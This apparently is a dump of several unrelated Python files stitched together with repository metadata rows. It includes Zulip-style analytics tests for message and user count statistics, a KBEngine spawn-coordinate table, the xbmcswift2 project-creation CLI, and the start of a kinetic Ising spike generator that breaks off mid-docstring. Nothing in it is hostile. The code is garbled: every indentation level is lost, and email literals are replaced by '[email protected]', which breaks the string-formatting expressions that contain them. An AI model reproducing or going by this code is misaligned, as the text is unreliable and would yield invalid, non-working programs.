def create_user(self, **kwargs):
# type: (**Any) -> UserProfile
self.name_counter += 1
defaults = {
'email': 'user%[email protected]' % (self.name_counter,),
'date_joined': self.TIME_LAST_HOUR,
'full_name': 'full_name',
'short_name': 'short_name',
'pointer': -1,
'last_pointer_updater': 'seems unused?',
'realm': self.default_realm,
'api_key': '42'}
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
return UserProfile.objects.create(**kwargs)
def create_stream_with_recipient(self, **kwargs):
# type: (**Any) -> Tuple[Stream, Recipient]
self.name_counter += 1
defaults = {'name': 'stream name %s' % (self.name_counter,),
'realm': self.default_realm,
'date_created': self.TIME_LAST_HOUR}
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
stream = Stream.objects.create(**kwargs)
recipient = Recipient.objects.create(type_id=stream.id, type=Recipient.STREAM)
return stream, recipient
def create_huddle_with_recipient(self, **kwargs):
# type: (**Any) -> Tuple[Huddle, Recipient]
self.name_counter += 1
defaults = {'huddle_hash': 'hash%s' % (self.name_counter,)}
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
huddle = Huddle.objects.create(**kwargs)
recipient = Recipient.objects.create(type_id=huddle.id, type=Recipient.HUDDLE)
return huddle, recipient
def create_message(self, sender, recipient, **kwargs):
# type: (UserProfile, Recipient, **Any) -> Message
defaults = {
'sender': sender,
'recipient': recipient,
'subject': 'subject',
'content': 'hi',
'pub_date': self.TIME_LAST_HOUR,
'sending_client': get_client("website")}
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
return Message.objects.create(**kwargs)
# kwargs should only ever be a UserProfile or Stream.
def assertCountEquals(self, table, value, property=None, subgroup=None,
end_time=TIME_ZERO, realm=None, **kwargs):
# type: (Type[BaseCount], int, Optional[Text], Optional[Text], datetime, Optional[Realm], **models.Model) -> None
if property is None:
property = self.current_property
queryset = table.objects.filter(property=property, end_time=end_time).filter(**kwargs)
if table is not InstallationCount:
if realm is None:
realm = self.default_realm
queryset = queryset.filter(realm=realm)
if subgroup is not None:
queryset = queryset.filter(subgroup=subgroup)
self.assertEqual(queryset.values_list('value', flat=True)[0], value)
def assertTableState(self, table, arg_keys, arg_values):
# type: (Type[BaseCount], List[str], List[List[Union[int, str, bool, datetime, Realm, UserProfile, Stream]]]) -> None
"""Assert that the state of a *Count table is what it should be.
Example usage:
self.assertTableState(RealmCount, ['property', 'subgroup', 'realm'],
[['p1', 4], ['p2', 10, self.alt_realm]])
table -- A *Count table.
arg_keys -- List of columns of <table>.
arg_values -- List of "rows" of <table>.
Each entry of arg_values (e.g. ['p1', 4]) represents a row of <table>.
The i'th value of the entry corresponds to the i'th arg_key, so e.g.
the first arg_values entry here corresponds to a row of RealmCount
with property='p1' and subgroup=10.
Any columns not specified (in this case, every column of RealmCount
other than property and subgroup) are either set to default values,
or are ignored.
The function checks that every entry of arg_values matches exactly one
row of <table>, and that no additional rows exist. Note that this means
checking a table with duplicate rows is not supported.
"""
defaults = {
'property': self.current_property,
'subgroup': None,
'end_time': self.TIME_ZERO}
for values in arg_values:
kwargs = {} # type: Dict[str, Any]
for i in range(len(values)):
kwargs[arg_keys[i]] = values[i]
for key, value in defaults.items():
kwargs[key] = kwargs.get(key, value)
if table is not InstallationCount:
if 'realm' not in kwargs:
if 'user' in kwargs:
kwargs['realm'] = kwargs['user'].realm
elif 'stream' in kwargs:
kwargs['realm'] = kwargs['stream'].realm
else:
kwargs['realm'] = self.default_realm
self.assertEqual(table.objects.filter(**kwargs).count(), 1)
self.assertEqual(table.objects.count(), len(arg_values))
class TestProcessCountStat(AnalyticsTestCase):
def make_dummy_count_stat(self, current_time):
# type: (datetime) -> CountStat
dummy_query = """INSERT INTO analytics_realmcount (realm_id, property, end_time, value)
VALUES (1, 'test stat', '%(end_time)s', 22)""" % {'end_time': current_time}
stat = CountStat('test stat', ZerverCountQuery(Recipient, UserCount, dummy_query),
{}, None, CountStat.HOUR, False)
return stat
def assertFillStateEquals(self, end_time, state=FillState.DONE, property=None):
# type: (datetime, int, Optional[Text]) -> None
stat = self.make_dummy_count_stat(end_time)
if property is None:
property = stat.property
fill_state = FillState.objects.filter(property=property).first()
self.assertEqual(fill_state.end_time, end_time)
self.assertEqual(fill_state.state, state)
def test_process_stat(self):
# type: () -> None
# process new stat
current_time = installation_epoch() + self.HOUR
stat = self.make_dummy_count_stat(current_time)
property = stat.property
process_count_stat(stat, current_time)
self.assertFillStateEquals(current_time)
self.assertEqual(InstallationCount.objects.filter(property=property).count(), 1)
# dirty stat
FillState.objects.filter(property=property).update(state=FillState.STARTED)
process_count_stat(stat, current_time)
self.assertFillStateEquals(current_time)
self.assertEqual(InstallationCount.objects.filter(property=property).count(), 1)
# clean stat, no update
process_count_stat(stat, current_time)
self.assertFillStateEquals(current_time)
self.assertEqual(InstallationCount.objects.filter(property=property).count(), 1)
# clean stat, with update
current_time = current_time + self.HOUR
stat = self.make_dummy_count_stat(current_time)
process_count_stat(stat, current_time)
self.assertFillStateEquals(current_time)
self.assertEqual(InstallationCount.objects.filter(property=property).count(), 2)
# This tests the is_logging branch of the code in do_delete_counts_at_hour.
# It is important that do_delete_counts_at_hour not delete any of the collected
# logging data!
def test_process_logging_stat(self):
# type: () -> None
end_time = self.TIME_ZERO
user_stat = LoggingCountStat('user stat', UserCount, CountStat.DAY)
stream_stat = LoggingCountStat('stream stat', StreamCount, CountStat.DAY)
realm_stat = LoggingCountStat('realm stat', RealmCount, CountStat.DAY)
user = self.create_user()
stream = self.create_stream_with_recipient()[0]
realm = self.default_realm
UserCount.objects.create(
user=user, realm=realm, property=user_stat.property, end_time=end_time, value=5)
StreamCount.objects.create(
stream=stream, realm=realm, property=stream_stat.property, end_time=end_time, value=5)
RealmCount.objects.create(
realm=realm, property=realm_stat.property, end_time=end_time, value=5)
# Normal run of process_count_stat
for stat in [user_stat, stream_stat, realm_stat]:
process_count_stat(stat, end_time)
self.assertTableState(UserCount, ['property', 'value'], [[user_stat.property, 5]])
self.assertTableState(StreamCount, ['property', 'value'], [[stream_stat.property, 5]])
self.assertTableState(RealmCount, ['property', 'value'],
[[user_stat.property, 5], [stream_stat.property, 5], [realm_stat.property, 5]])
self.assertTableState(InstallationCount, ['property', 'value'],
[[user_stat.property, 5], [stream_stat.property, 5], [realm_stat.property, 5]])
# Change the logged data and mark FillState as dirty
UserCount.objects.update(value=6)
StreamCount.objects.update(value=6)
RealmCount.objects.filter(property=realm_stat.property).update(value=6)
FillState.objects.update(state=FillState.STARTED)
# Check that the change propagated (and the collected data wasn't deleted)
for stat in [user_stat, stream_stat, realm_stat]:
process_count_stat(stat, end_time)
self.assertTableState(UserCount, ['property', 'value'], [[user_stat.property, 6]])
self.assertTableState(StreamCount, ['property', 'value'], [[stream_stat.property, 6]])
self.assertTableState(RealmCount, ['property', 'value'],
[[user_stat.property, 6], [stream_stat.property, 6], [realm_stat.property, 6]])
self.assertTableState(InstallationCount, ['property', 'value'],
[[user_stat.property, 6], [stream_stat.property, 6], [realm_stat.property, 6]])
class TestCountStats(AnalyticsTestCase):
def setUp(self):
# type: () -> None
super(TestCountStats, self).setUp()
# This tests two things for each of the queries/CountStats: Handling
# more than 1 realm, and the time bounds (time_start and time_end in
# the queries).
self.second_realm = Realm.objects.create(
string_id='second-realm', name='Second Realm',
domain='second.analytics', date_created=self.TIME_ZERO-2*self.DAY)
for minutes_ago in [0, 1, 61, 60*24+1]:
creation_time = self.TIME_ZERO - minutes_ago*self.MINUTE
user = self.create_user(email='user-%[email protected]' % (minutes_ago,),
realm=self.second_realm, date_joined=creation_time)
recipient = self.create_stream_with_recipient(
name='stream %s' % (minutes_ago,), realm=self.second_realm,
date_created=creation_time)[1]
self.create_message(user, recipient, pub_date=creation_time)
self.hourly_user = UserProfile.objects.get(email='[email protected]')
self.daily_user = UserProfile.objects.get(email='[email protected]')
# This realm should not show up in the *Count tables for any of the
# messages_* CountStats
self.no_message_realm = Realm.objects.create(
string_id='no-message-realm', name='No Message Realm',
domain='no.message', date_created=self.TIME_ZERO-2*self.DAY)
self.create_user(realm=self.no_message_realm)
self.create_stream_with_recipient(realm=self.no_message_realm)
# This huddle should not show up anywhere
self.create_huddle_with_recipient()
def test_active_users_by_is_bot(self):
# type: () -> None
stat = COUNT_STATS['active_users:is_bot:day']
self.current_property = stat.property
# To be included
self.create_user(is_bot=True)
self.create_user(is_bot=True, date_joined=self.TIME_ZERO-25*self.HOUR)
self.create_user(is_bot=False)
# To be excluded
self.create_user(is_active=False)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[2, 'true'], [1, 'false'],
[3, 'false', self.second_realm],
[1, 'false', self.no_message_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'], [[2, 'true'], [5, 'false']])
self.assertTableState(UserCount, [], [])
self.assertTableState(StreamCount, [], [])
def test_messages_sent_by_is_bot(self):
# type: () -> None
stat = COUNT_STATS['messages_sent:is_bot:hour']
self.current_property = stat.property
bot = self.create_user(is_bot=True)
human1 = self.create_user()
human2 = self.create_user()
recipient_human1 = Recipient.objects.create(type_id=human1.id, type=Recipient.PERSONAL)
recipient_stream = self.create_stream_with_recipient()[1]
recipient_huddle = self.create_huddle_with_recipient()[1]
self.create_message(bot, recipient_human1)
self.create_message(bot, recipient_stream)
self.create_message(bot, recipient_huddle)
self.create_message(human1, recipient_human1)
self.create_message(human2, recipient_human1)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertTableState(UserCount, ['value', 'subgroup', 'user'],
[[1, 'false', human1], [1, 'false', human2], [3, 'true', bot],
[1, 'false', self.hourly_user]])
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[2, 'false'], [3, 'true'], [1, 'false', self.second_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'], [[3, 'false'], [3, 'true']])
self.assertTableState(StreamCount, [], [])
def test_messages_sent_by_message_type(self):
# type: () -> None
stat = COUNT_STATS['messages_sent:message_type:day']
self.current_property = stat.property
# Nothing currently in this stat that is bot related, but so many of
# the rest of our stats make the human/bot distinction that one can
# imagine a later refactoring that will intentionally or
# unintentionally change this. So make one of our users a bot.
user1 = self.create_user(is_bot=True)
user2 = self.create_user()
user3 = self.create_user()
# private streams
recipient_stream1 = self.create_stream_with_recipient(invite_only=True)[1]
recipient_stream2 = self.create_stream_with_recipient(invite_only=True)[1]
self.create_message(user1, recipient_stream1)
self.create_message(user2, recipient_stream1)
self.create_message(user2, recipient_stream2)
# public streams
recipient_stream3 = self.create_stream_with_recipient()[1]
recipient_stream4 = self.create_stream_with_recipient()[1]
self.create_message(user1, recipient_stream3)
self.create_message(user1, recipient_stream4)
self.create_message(user2, recipient_stream3)
# huddles
recipient_huddle1 = self.create_huddle_with_recipient()[1]
recipient_huddle2 = self.create_huddle_with_recipient()[1]
self.create_message(user1, recipient_huddle1)
self.create_message(user2, recipient_huddle2)
# private messages
recipient_user1 = Recipient.objects.create(type_id=user1.id, type=Recipient.PERSONAL)
recipient_user2 = Recipient.objects.create(type_id=user2.id, type=Recipient.PERSONAL)
recipient_user3 = Recipient.objects.create(type_id=user3.id, type=Recipient.PERSONAL)
self.create_message(user1, recipient_user2)
self.create_message(user2, recipient_user1)
self.create_message(user3, recipient_user3)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertTableState(UserCount, ['value', 'subgroup', 'user'],
[[1, 'private_stream', user1],
[2, 'private_stream', user2],
[2, 'public_stream', user1],
[1, 'public_stream', user2],
[2, 'private_message', user1],
[2, 'private_message', user2],
[1, 'private_message', user3],
[1, 'public_stream', self.hourly_user],
[1, 'public_stream', self.daily_user]])
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[3, 'private_stream'], [3, 'public_stream'], [5, 'private_message'],
[2, 'public_stream', self.second_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'],
[[3, 'private_stream'], [5, 'public_stream'], [5, 'private_message']])
self.assertTableState(StreamCount, [], [])
def test_messages_sent_to_recipients_with_same_id(self):
# type: () -> None
stat = COUNT_STATS['messages_sent:message_type:day']
self.current_property = stat.property
user = self.create_user(id=1000)
user_recipient = Recipient.objects.create(type_id=user.id, type=Recipient.PERSONAL)
stream_recipient = self.create_stream_with_recipient(id=1000)[1]
huddle_recipient = self.create_huddle_with_recipient(id=1000)[1]
self.create_message(user, user_recipient)
self.create_message(user, stream_recipient)
self.create_message(user, huddle_recipient)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertCountEquals(UserCount, 2, subgroup='private_message')
self.assertCountEquals(UserCount, 1, subgroup='public_stream')
def test_messages_sent_by_client(self):
# type: () -> None
stat = COUNT_STATS['messages_sent:client:day']
self.current_property = stat.property
user1 = self.create_user(is_bot=True)
user2 = self.create_user()
recipient_user2 = Recipient.objects.create(type_id=user2.id, type=Recipient.PERSONAL)
recipient_stream = self.create_stream_with_recipient()[1]
recipient_huddle = self.create_huddle_with_recipient()[1]
client2 = Client.objects.create(name='client2')
self.create_message(user1, recipient_user2, sending_client=client2)
self.create_message(user1, recipient_stream)
self.create_message(user1, recipient_huddle)
self.create_message(user2, recipient_user2, sending_client=client2)
self.create_message(user2, recipient_user2, sending_client=client2)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
client2_id = str(client2.id)
website_client_id = str(get_client('website').id) # default for self.create_message
self.assertTableState(UserCount, ['value', 'subgroup', 'user'],
[[2, website_client_id, user1],
[1, client2_id, user1], [2, client2_id, user2],
[1, website_client_id, self.hourly_user],
[1, website_client_id, self.daily_user]])
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[2, website_client_id], [3, client2_id],
[2, website_client_id, self.second_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'],
[[4, website_client_id], [3, client2_id]])
self.assertTableState(StreamCount, [], [])
def test_messages_sent_to_stream_by_is_bot(self):
# type: () -> None
stat = COUNT_STATS['messages_in_stream:is_bot:day']
self.current_property = stat.property
bot = self.create_user(is_bot=True)
human1 = self.create_user()
human2 = self.create_user()
recipient_human1 = Recipient.objects.create(type_id=human1.id, type=Recipient.PERSONAL)
stream1, recipient_stream1 = self.create_stream_with_recipient()
stream2, recipient_stream2 = self.create_stream_with_recipient()
# To be included
self.create_message(human1, recipient_stream1)
self.create_message(human2, recipient_stream1)
self.create_message(human1, recipient_stream2)
self.create_message(bot, recipient_stream2)
self.create_message(bot, recipient_stream2)
# To be excluded
self.create_message(human2, recipient_human1)
self.create_message(bot, recipient_human1)
recipient_huddle = self.create_huddle_with_recipient()[1]
self.create_message(human1, recipient_huddle)
do_fill_count_stat_at_hour(stat, self.TIME_ZERO)
self.assertTableState(StreamCount, ['value', 'subgroup', 'stream'],
[[2, 'false', stream1], [1, 'false', stream2], [2, 'true', stream2],
# "hourly" and "daily" stream, from TestCountStats.setUp
[1, 'false', Stream.objects.get(name='stream 1')],
[1, 'false', Stream.objects.get(name='stream 61')]])
self.assertTableState(RealmCount, ['value', 'subgroup', 'realm'],
[[3, 'false'], [2, 'true'], [2, 'false', self.second_realm]])
self.assertTableState(InstallationCount, ['value', 'subgroup'], [[5, 'false'], [2, 'true']])
self.assertTableState(UserCount, [], [])
class TestDoAggregateToSummaryTable(AnalyticsTestCase):
# do_aggregate_to_summary_table is mostly tested by the end to end
# nature of the tests in TestCountStats. But want to highlight one
# feature important for keeping the size of the analytics tables small,
# which is that if there is no relevant data in the table being
# aggregated, the aggregation table doesn't get a row with value 0.
def test_no_aggregated_zeros(self):
# type: () -> None
stat = LoggingCountStat('test stat', UserCount, CountStat.HOUR)
do_aggregate_to_summary_table(stat, self.TIME_ZERO)
self.assertFalse(RealmCount.objects.exists())
self.assertFalse(InstallationCount.objects.exists())
class TestDoIncrementLoggingStat(AnalyticsTestCase):
def test_table_and_id_args(self):
# type: () -> None
# For realms, streams, and users, tests that the new rows are going to
# the appropriate *Count table, and that using a different zerver_object
# results in a new row being created
self.current_property = 'test'
second_realm = Realm.objects.create(string_id='moo', name='moo', domain='moo')
stat = LoggingCountStat('test', RealmCount, CountStat.DAY)
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO)
do_increment_logging_stat(second_realm, stat, None, self.TIME_ZERO)
self.assertTableState(RealmCount, ['realm'], [[self.default_realm], [second_realm]])
user1 = self.create_user()
user2 = self.create_user()
stat = LoggingCountStat('test', UserCount, CountStat.DAY)
do_increment_logging_stat(user1, stat, None, self.TIME_ZERO)
do_increment_logging_stat(user2, stat, None, self.TIME_ZERO)
self.assertTableState(UserCount, ['user'], [[user1], [user2]])
stream1 = self.create_stream_with_recipient()[0]
stream2 = self.create_stream_with_recipient()[0]
stat = LoggingCountStat('test', StreamCount, CountStat.DAY)
do_increment_logging_stat(stream1, stat, None, self.TIME_ZERO)
do_increment_logging_stat(stream2, stat, None, self.TIME_ZERO)
self.assertTableState(StreamCount, ['stream'], [[stream1], [stream2]])
def test_frequency(self):
# type: () -> None
times = [self.TIME_ZERO - self.MINUTE*i for i in [0, 1, 61, 24*60+1]]
stat = LoggingCountStat('day test', RealmCount, CountStat.DAY)
for time_ in times:
do_increment_logging_stat(self.default_realm, stat, None, time_)
stat = LoggingCountStat('hour test', RealmCount, CountStat.HOUR)
for time_ in times:
do_increment_logging_stat(self.default_realm, stat, None, time_)
self.assertTableState(RealmCount, ['value', 'property', 'end_time'],
[[3, 'day test', self.TIME_ZERO],
[1, 'day test', self.TIME_ZERO - self.DAY],
[2, 'hour test', self.TIME_ZERO],
[1, 'hour test', self.TIME_LAST_HOUR],
[1, 'hour test', self.TIME_ZERO - self.DAY]])
def test_get_or_create(self):
# type: () -> None
stat = LoggingCountStat('test', RealmCount, CountStat.HOUR)
# All these should trigger the create part of get_or_create.
        # property is tested in test_frequency, and id_args are tested in test_table_and_id_args,
# so this only tests a new subgroup and end_time
do_increment_logging_stat(self.default_realm, stat, 'subgroup1', self.TIME_ZERO)
do_increment_logging_stat(self.default_realm, stat, 'subgroup2', self.TIME_ZERO)
do_increment_logging_stat(self.default_realm, stat, 'subgroup1', self.TIME_LAST_HOUR)
self.current_property = 'test'
self.assertTableState(RealmCount, ['value', 'subgroup', 'end_time'],
[[1, 'subgroup1', self.TIME_ZERO], [1, 'subgroup2', self.TIME_ZERO],
[1, 'subgroup1', self.TIME_LAST_HOUR]])
# This should trigger the get part of get_or_create
do_increment_logging_stat(self.default_realm, stat, 'subgroup1', self.TIME_ZERO)
self.assertTableState(RealmCount, ['value', 'subgroup', 'end_time'],
[[2, 'subgroup1', self.TIME_ZERO], [1, 'subgroup2', self.TIME_ZERO],
[1, 'subgroup1', self.TIME_LAST_HOUR]])
def test_increment(self):
# type: () -> None
stat = LoggingCountStat('test', RealmCount, CountStat.DAY)
self.current_property = 'test'
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO, increment=-1)
self.assertTableState(RealmCount, ['value'], [[-1]])
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO, increment=3)
self.assertTableState(RealmCount, ['value'], [[2]])
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO)
self.assertTableState(RealmCount, ['value'], [[3]])
class TestLoggingCountStats(AnalyticsTestCase):
def test_aggregation(self):
# type: () -> None
stat = LoggingCountStat('realm test', RealmCount, CountStat.DAY)
do_increment_logging_stat(self.default_realm, stat, None, self.TIME_ZERO)
process_count_stat(stat, self.TIME_ZERO)
user = self.create_user()
stat = LoggingCountStat('user test', UserCount, CountStat.DAY)
do_increment_logging_stat(user, stat, None, self.TIME_ZERO)
process_count_stat(stat, self.TIME_ZERO)
stream = self.create_stream_with_recipient()[0]
stat = LoggingCountStat('stream test', StreamCount, CountStat.DAY)
do_increment_logging_stat(stream, stat, None, self.TIME_ZERO)
process_count_stat(stat, self.TIME_ZERO)
self.assertTableState(InstallationCount, ['property', 'value'],
[['realm test', 1], ['user test', 1], ['stream test', 1]])
self.assertTableState(RealmCount, ['property', 'value'],
[['realm test', 1], ['user test', 1], ['stream test', 1]])
self.assertTableState(UserCount, ['property', 'value'], [['user test', 1]])
self.assertTableState(StreamCount, ['property', 'value'], [['stream test', 1]])
def test_active_users_log_by_is_bot(self):
# type: () -> None
property = 'active_users_log:is_bot:day'
user = do_create_user('email', 'password', self.default_realm, 'full_name', 'short_name')
self.assertEqual(1, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
do_deactivate_user(user)
self.assertEqual(0, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
do_activate_user(user)
self.assertEqual(1, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
do_deactivate_user(user)
self.assertEqual(0, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
do_reactivate_user(user)
self.assertEqual(1, RealmCount.objects.filter(property=property, subgroup=False)
.aggregate(Sum('value'))['value__sum'])
| apache-2.0 | 4,257,407,679,303,316,500 | 50.127869 | 125 | 0.613441 | false |
LaoZhongGu/kbengine | demo/res/scripts/data/d_spaces_spawns.py | 3 | 2636 | # -*- coding: utf-8 -*-
datas={
1: [
],
2: [
(1001, (-102.9299, 191.0, -150.922),(0.0,0.0,0.0), 1),
(1002, (-105.0, 191.0, -150.922),(0.0,0.0,0.0), 1),
(1003, (-132.9299, 191.0, -150.922),(0.0,0.0,0.0), 1),
(1003, (-137.833725, 170.639648, -202.246201),(0.0,0.0,0.0), 1),
(1003, (-146.968063, 161.339844, -231.600098),(0.0,0.0,0.0), 1),
(1003, (-94.462944, 180.093750, -195.883881),(0.0,0.0,0.0), 1),
(1003, (-103.794640, 177.567383, -220.648834),(0.0,0.0,0.0), 1),
(1003, (-83.443954, 178.699219, -239.645569),(0.0,0.0,0.0), 1),
(1003, (-72.320412, 181.892578, -219.838470),(0.0,0.0,0.0), 1),
(1004, (-69.049957, 179.322266, -175.957031),(0.0,0.0,0.0), 1),
(1004, (-60.296272, 181.892578, -220.473770),(0.0,0.0,0.0), 1),
(1004, (-44.794971, 184.611328, -200.343048),(0.0,0.0,0.0), 1),
(1004, (-41.807720, 183.460938, -160.731979),(0.0,0.0,0.0), 1),
(1004, (-61.230453, 181.336914, -144.657440),(0.0,0.0,0.0), 1),
(1004, (-71.636917, 181.903320, -140.565033),(0.0,0.0,0.0), 1),
(1004, (-73.323441, 180.928711, -160.713318),(0.0,0.0,0.0), 1),
(1004, (-53.436718, 183.460938, -125.980476),(0.0,0.0,0.0), 1),
(1004, (-64.340378, 186.237305, -121.070831),(0.0,0.0,0.0), 1),
],
3: [
(1001, (-102.9299, 1.5, -150.922),(0.0,0.0,0.0), 1),
(1002, (-105.0, 1.5, -150.922),(0.0,0.0,0.0), 1),
(1003, (-132.9299, 1.5, -150.922),(0.0,0.0,0.0), 1),
(1003, (-137.833725, 1.5, -202.246201),(0.0,0.0,0.0), 1),
(1003, (-146.968063, 1.5, -231.600098),(0.0,0.0,0.0), 1),
(1003, (-94.462944, 1.5, -195.883881),(0.0,0.0,0.0), 1),
(1003, (-103.794640, 1.5, -220.648834),(0.0,0.0,0.0), 1),
(1003, (-83.443954, 1.5, -239.645569),(0.0,0.0,0.0), 1),
(1003, (-72.320412, 1.5, -219.838470),(0.0,0.0,0.0), 1),
(1004, (-69.049957, 1.5, -175.957031),(0.0,0.0,0.0), 1),
(1004, (-60.296272, 1.5, -220.473770),(0.0,0.0,0.0), 1),
(1004, (-44.794971, 1.5, -200.343048),(0.0,0.0,0.0), 1),
(1004, (-41.807720, 1.5, -160.731979),(0.0,0.0,0.0), 1),
(1004, (-61.230453, 1.5, -144.657440),(0.0,0.0,0.0), 1),
(1004, (-71.636917, 1.5, -140.565033),(0.0,0.0,0.0), 1),
(1004, (-73.323441, 1.5, -160.713318),(0.0,0.0,0.0), 1),
(1004, (-53.436718, 1.5, -125.980476),(0.0,0.0,0.0), 1),
(1004, (-64.340378, 1.5, -121.070831),(0.0,0.0,0.0), 1),
(40001001, (-34.340378, 1.5, -121.070831),(0.0,0.0,0.0), 1),
(40001003, (-20.340378, 1.5, -150.070831),(0.0,0.0,0.0), 1),
],
4: [
(40001002, (10, 1.5, 0),(0.0,0.0,0.0), 1),
],
5: [
(1001, (-102.9299, 1.5, -150.922),(0.0,0.0,0.0), 1),
(1002, (-105.0, 1.5, -150.922),(0.0,0.0,0.0), 1),
(40001002, (-34.340378, 1.5, -121.070831),(0.0,0.0,0.0), 1),
]
}
| lgpl-3.0 | 6,214,054,206,730,106,000 | 46.071429 | 66 | 0.515175 | false |
wndias/bc.repository | plugin.video.kmediatorrent/resources/site-packages/xbmcswift2/cli/create.py | 20 | 5636 | '''
xbmcswift2.cli.create
---------------------
This module contains the code to initialize a new XBMC addon project.
:copyright: (c) 2012 by Jonathan Beluch
:license: GPLv3, see LICENSE for more details.
'''
import os
import string
import readline
from os import getcwd
from xml.sax import saxutils
from optparse import OptionParser
from shutil import copytree, ignore_patterns
from getpass import getpass
class CreateCommand(object):
'''A CLI command to initialize a new XBMC addon project.'''
command = 'create'
usage = '%prog create'
@staticmethod
def run(opts, args):
'''Required run function for the 'create' CLI command.'''
create_new_project()
# Path to skeleton file templates dir
SKEL = os.path.join(os.path.dirname(__file__), 'data')
def error_msg(msg):
'''A decorator that sets the error_message attribute of the decorated
function to the provided value.
'''
def decorator(func):
'''Sets the error_message attribute on the provided function'''
func.error_message = msg
return func
return decorator
def parse_cli():
'''Currently only one positional arg, create.'''
parser = OptionParser()
return parser.parse_args()
@error_msg('** Value must be non-blank.')
def validate_nonblank(value):
    '''A callable that returns the value passed'''
return value
@error_msg('** Value must contain only letters or underscores.')
def validate_pluginid(value):
'''Returns True if the provided value is a valid pluglin id'''
valid = string.ascii_letters + string.digits + '.'
return all(c in valid for c in value)
@error_msg('** The provided path must be an existing folder.')
def validate_isfolder(value):
'''Returns true if the provided path is an existing directory'''
return os.path.isdir(value)
def get_valid_value(prompt, validator, default=None):
'''Displays the provided prompt and gets input from the user. This behavior
loops indefinitely until the provided validator returns True for the user
input. If a default value is provided, it will be used only if the user
hits Enter and does not provide a value.
If the validator callable has an error_message attribute, it will be
displayed for an invalid value, otherwise a generic message is used.
'''
ans = get_value(prompt, default)
while not validator(ans):
try:
print validator.error_message
except AttributeError:
print 'Invalid value.'
ans = get_value(prompt, default)
return ans
def get_value(prompt, default=None, hidden=False):
'''Displays the provided prompt and returns the input from the user. If the
user hits Enter and there is a default value provided, the default is
returned.
'''
_prompt = '%s : ' % prompt
if default:
_prompt = '%s [%s]: ' % (prompt, default)
if hidden:
ans = getpass(_prompt)
else:
ans = raw_input(_prompt)
# If user hit Enter and there is a default value
if not ans and default:
ans = default
return ans
def update_file(filename, items):
'''Edits the given file in place, replacing any instances of {key} with the
appropriate value from the provided items dict. If the given filename ends
with ".xml" values will be quoted and escaped for XML.
'''
# TODO: Implement something in the templates to denote whether the value
# being replaced is an XML attribute or a value. Perhaps move to dyanmic
# XML tree building rather than string replacement.
should_escape = filename.endswith('addon.xml')
with open(filename, 'r') as inp:
text = inp.read()
for key, val in items.items():
if should_escape:
val = saxutils.quoteattr(val)
text = text.replace('{%s}' % key, val)
output = text
with open(filename, 'w') as out:
out.write(output)
def create_new_project():
'''Creates a new XBMC Addon directory based on user input'''
readline.parse_and_bind('tab: complete')
print \
'''
xbmcswift2 - A micro-framework for creating XBMC plugins.
[email protected]
--
'''
print 'I\'m going to ask you a few questions to get this project' \
' started.'
opts = {}
# Plugin Name
opts['plugin_name'] = get_valid_value(
'What is your plugin name?',
validate_nonblank
)
# Plugin ID
opts['plugin_id'] = get_valid_value(
'Enter your plugin id.',
validate_pluginid,
'plugin.video.%s' % (opts['plugin_name'].lower().replace(' ', ''))
)
# Parent Directory
opts['parent_dir'] = get_valid_value(
'Enter parent folder (where to create project)',
validate_isfolder,
getcwd()
)
opts['plugin_dir'] = os.path.join(opts['parent_dir'], opts['plugin_id'])
assert not os.path.isdir(opts['plugin_dir']), \
'A folder named %s already exists in %s.' % (opts['plugin_id'],
opts['parent_dir'])
# Provider
opts['provider_name'] = get_valid_value(
'Enter provider name',
validate_nonblank,
)
# Create the project folder by copying over skel
copytree(SKEL, opts['plugin_dir'], ignore=ignore_patterns('*.pyc'))
# Walk through all the new files and fill in with out options
for root, dirs, files in os.walk(opts['plugin_dir']):
for filename in files:
update_file(os.path.join(root, filename), opts)
    print 'Project successfully created in %s.' % opts['plugin_dir']
print 'Done.'
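# Illustrative sketch (added by the editor; not part of the original module) of the
# "{key}" substitution that update_file() performs on skeleton files. The file name
# and option values below are assumptions, not files shipped with xbmcswift2.
def _update_file_example():
    # Given a template containing e.g.  <addon id={plugin_id} name={plugin_name}>,
    # this call rewrites the file in place; addon.xml values are passed through
    # saxutils.quoteattr, so {plugin_id} becomes "plugin.video.example" (quoted).
    update_file('skel/addon.xml', {'plugin_id': 'plugin.video.example',
                                   'plugin_name': 'Example Plugin'})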
| gpl-2.0 | -3,313,580,659,413,640,700 | 28.820106 | 79 | 0.642832 | false |
noashin/kinetic_ising_model_neurons | spikes_activity_generator.py | 1 | 3550 | import numpy as np
from scipy import stats
from scipy.special import expit
from scipy.stats import multivariate_normal
def exp_cosh(H):
beta = 1.0
return 0.5 * np.exp(beta * H)/np.cosh(beta * H)
def gaussian(H):
#import ipdb; ipdb.set_trace()
a = 1
cov = np.diag(np.repeat(a, H.shape[1]))
return np.random.multivariate_normal(H[0], cov)
def kinetic_ising_model(S, J, energy_function):
""" Returns probabilities of S[t+1,n] being one.
:param S: numpy.ndarray (T,N)
Binary data where an entry is either 1 ('spike') or -1 ('silence').
:param J: numpy.ndarray (N, N)
Coupling matrix
:return: numpy.ndarray (T,N)
